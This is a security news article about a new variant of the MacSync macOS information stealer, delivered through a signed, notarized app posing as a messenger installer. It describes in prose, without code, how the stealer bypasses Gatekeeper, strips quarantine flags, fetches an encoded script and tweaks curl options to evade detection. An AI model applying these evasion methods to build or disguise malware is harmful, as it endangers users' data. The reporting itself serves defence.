A new version of the MacSync information stealer has surfaced, representing a tactical evolution in how macOS malware evades built-in security features. Security researchers at Jamf discovered that the malware is now being distributed through a digitally signed and notarized Swift application, which allows it to bypass Apple’s Gatekeeper and XProtect protections that typically block unverified software. By appearing as a legitimate installer for a messaging service, the malware decreases the likelihood of user suspicion and avoids the manual terminal commands required by previous iterations of the same threat.

The infection process begins when a user downloads a disk image file named zk-call-messenger-installer-3.9.2-lts.dmg from a specific distribution website. Because the application within the disk image carries a valid developer signature and has been notarized by Apple, it can be launched without the standard security warnings that usually greet unsigned software. Despite this high level of technical evasion, the installer still includes instructions for the user to right-click and open the file, a classic social engineering trick often used to bypass different layers of system safeguards. Apple has moved to address the specific threat by revoking the certificate associated with the malicious code.

GET 50% Discount for VPN/ANTIVIRUS SOFTWARE AT 911Cyber - CODE: bit5025

Once the installer is launched, the Swift-based dropper does not immediately deploy its payload. Instead, it performs several environmental checks to ensure the system is suitable for infection and to avoid detection by security analysts. These checks include verifying that the machine has an active internet connection and enforcing a minimum execution interval of one hour. This rate-limiting tactic is designed to prevent the malware from running too frequently on the same machine, which might otherwise draw the attention of system monitoring tools or network administrators.

The dropper further prepares the system by removing quarantine attributes from its files, ensuring that subsequent malicious actions are not hindered by macOS security flags. After these preliminary steps are completed, the application uses a helper component to download and run an encoded script. This script serves as the primary engine for the information-stealing activities, allowing the attackers to begin harvesting sensitive data from the compromised Mac while maintaining a relatively low profile on the device.

Analysis of the network commands used by this variant reveals significant changes in its communication style compared to older versions of MacSync. Researchers noted that the malware now uses modified curl flags to retrieve its secondary payload, splitting traditional command combinations and adding specific options to bypass proxy servers. These subtle changes in the underlying code suggest an effort by the developers to stay ahead of signature-based detection and to ensure that their data retrieval remains successful even in more complex network environments.

Source: New MacSync macOS Stealer Uses Signed App To Bypass Apple Gatekeeper